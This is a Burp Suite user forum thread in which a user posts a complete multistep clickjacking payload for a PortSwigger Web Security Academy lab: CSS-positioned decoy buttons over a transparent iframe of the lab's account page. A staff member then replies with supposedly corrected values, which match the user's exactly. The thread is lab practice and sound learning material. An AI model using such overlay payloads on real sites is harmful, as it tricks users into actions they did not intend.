Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Multistep Clickjacking, lab is not getting solved.

C4r3t | Last updated: Apr 21, 2022 02:11PM UTC

Lab is not solving, even I executing the correct payload. I Tried viewing the exploit but it seems to be at the right positions. But I don't know why, after delivering the exploit to the victim, lab is not getting solved. please check for errors in payload. <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.1; z-index: 2; } .firstClick, .secondClick { position:absolute; top:530px; left:50px; z-index: 1; } .secondClick { top: 295px; left: 210px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://acf21ff31e1ce9a8c00216b400d500fa.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Apr 22, 2022 06:31AM UTC

Hi, If I use your payload values for this particular lab the first 'Click me' element seems to be slightly misaligned - do both of the 'click me' elements definitely overlap the corresponding buttons so that the cursor icon changes if you hover over them? For completeness, I used the following values to successfully solve the lab (I had to slightly alter the 'top' value for the firstClick element): .firstClick, .secondClick { position:absolute; top:530px; left:50px; z-index: 1; } .secondClick { top: 295px; left: 210px; }

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.